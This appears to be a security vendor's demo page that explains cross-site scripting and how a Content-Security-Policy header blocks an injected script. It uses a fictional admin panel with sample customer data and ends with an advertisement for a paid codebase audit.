What Happens Without a CSP Header
Without a Content-Security-Policy header, a single XSS bug is all an attacker needs to hijack the admin session. Watch it happen, then see a CSP header block the same injected script.
A real-looking SaaS app
You'll see MySaaS, a fictional admin panel with customer names, emails, and payment cards.
An attacker steals everything
A malicious script runs in the browser, hijacks the admin session, and dumps all customer data.
One header stops it cold
Enable a Content-Security-Policy header and watch the exact same attack fail: with a policy such as `script-src 'self'`, the browser refuses to run the injected inline script even though the XSS bug is still there.
Below is MySaaS, a fictional app with sample customer data. It has an XSS vulnerability and no CSP header.
Customer Data
4 active accounts
| Name | Email | Plan | Card |
|---|---|---|---|
| Emma Johnson | emma@stripe.com | Enterprise | ****4242 |
| James Chen | james@linear.app | Pro | ****8888 |
| Sofia Martinez | sofia@vercel.com | Enterprise | ****1234 |
| Alex Kim | alex@shopify.com | Pro | ****5678 |
Internal notes (rendered as HTML)
What is XSS?
Cross-Site Scripting (XSS) happens when an application renders user-supplied content as HTML without escaping it. If an attacker can inject a <script> tag, the browser executes it in the page's origin: it can read the DOM, read any cookie that is not flagged HttpOnly, and send requests that carry the victim's session. An HttpOnly session cookie cannot be read through document.cookie, but the injected script can still act as the admin from inside the page, so that flag is a mitigation, not a fix for the XSS itself.
The vulnerability below
MySaaS has an "Internal notes" field that renders raw HTML. An attacker has placed a script tag in that field that sends the admin's session cookie to an external server; the moment an admin opens the page, the script runs with no CSP to stop it.
Go Deeper With a Full Codebase Audit
The free scan checks what's visible from the outside. A full ShipShield audit connects to your GitHub repo and analyzes your actual source code, dependencies, infrastructure, and more, covering 5,000,000+ vulnerability signatures.
Exposed Secrets
API keys, credentials, and tokens buried in code and git history
Auth & Authorization
Missing auth checks, weak JWT config, privilege escalation paths
Injection Vulnerabilities
SQL injection, XSS, SSRF, and command injection in your source code
Dependency CVEs
Known vulnerabilities across npm, pip, cargo, and go packages
AI Business Logic Review
AI-powered analysis of input validation, race conditions, and logic flaws
Sensitive Data Flows
PII logging, unencrypted data transmission, and storage issues
Infrastructure Security
Rate limiting, request size limits, and file upload restrictions
Docker & Container Scanning
Container misconfigs, exposed ports, running as root, OS-level CVEs
License Compliance
GPL/AGPL copyleft detection across all your dependencies
SBOM Generation
SPDX-format Software Bill of Materials for compliance and audits
Supply Chain Security
Typosquatting detection and suspicious package analysis
Professional PDF Report
Detailed findings with severity ratings, code references, and AI-powered fix suggestions
Scans complete in 2-8 minutes · Automatic refund if scan fails